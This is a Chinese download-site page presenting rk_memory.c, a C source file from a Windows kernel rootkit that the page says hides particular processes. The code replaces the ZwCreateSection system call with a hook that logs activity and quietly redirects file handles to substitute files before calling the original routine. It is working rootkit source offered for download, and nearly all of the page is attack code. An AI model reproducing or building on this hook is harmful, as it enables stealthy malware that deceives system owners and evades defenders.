⭐ 欢迎来到虫虫下载站! | 📦 资源下载 📁 资源专辑 ℹ️ 关于我们
⭐ 虫虫下载站

📄 rk_memory.c

📁 能够在windows 2000以上操作系统下隐藏特定的进程
💻 C
字号:

#include "rk_driver.h"
#include "rk_memory.h"
#include "rk_defense.h"

/* NT memory manager */

/* __________________________________________________________________________
 . tis R h00k - creating section - usually no object attributes here
 . __________________________________________________________________________ */
#define SEC_FILE           0x800000     
#define SEC_IMAGE         0x1000000     
#define SEC_RESERVE       0x4000000     
#define SEC_COMMIT        0x8000000     
#define SEC_NOCACHE      0x10000000     

NTSTATUS NewZwCreateSection (
	OUT PHANDLE phSection,
	IN ACCESS_MASK DesiredAccess,
	IN POBJECT_ATTRIBUTES ObjectAttributes,
	IN PLARGE_INTEGER MaximumSize OPTIONAL,
	IN ULONG SectionPageProtection,
	IN ULONG AllocationAttributes,
	IN HANDLE hFile OPTIONAL
	)
{
		int rc;
		CHAR aProcessName[PROCNAMELEN];
		
		GetProcessName( aProcessName );        
		DbgPrint("rootkit: NewZwCreateSection() from %s\n", aProcessName);

		DumpObjectAttributes(ObjectAttributes);
		
		if(AllocationAttributes & SEC_FILE)
			DbgPrint("AllocationAttributes & SEC_FILE\n");
		if(AllocationAttributes & SEC_IMAGE)
			DbgPrint("AllocationAttributes & SEC_IMAGE\n");
		if(AllocationAttributes & SEC_RESERVE)
			DbgPrint("AllocationAttributes & SEC_RESERVE\n");
		if(AllocationAttributes & SEC_COMMIT)
			DbgPrint("AllocationAttributes & SEC_COMMIT\n");
		if(AllocationAttributes & SEC_NOCACHE)
			DbgPrint("AllocationAttributes & SEC_NOCACHE\n");

		DbgPrint("ZwCreateSection hFile == 0x%X\n", hFile);

#if 1
		if(hFile)
		{
			HANDLE newFileH = CheckForRedirectedFile( hFile );
			if(newFileH){
				hFile = newFileH;
			}
		}
#endif

		rc=((ZWCREATESECTION)(OldZwCreateSection)) (
                        phSection,
                        DesiredAccess,
                        ObjectAttributes,
                        MaximumSize,
                        SectionPageProtection,
                        AllocationAttributes,
                        hFile);
		if(phSection) 
		{
			DbgPrint("section handle 0x%X\n", *phSection);
		}

        DbgPrint("rootkit: ZwCreateSection : rc = %x\n", rc);
        return rc;
}

⌨️ 快捷键说明

复制代码 Ctrl + C
搜索代码 Ctrl + F
全屏模式 F11
切换主题 Ctrl + Shift + D
显示快捷键 ?
增大字号 Ctrl + =
减小字号 Ctrl + -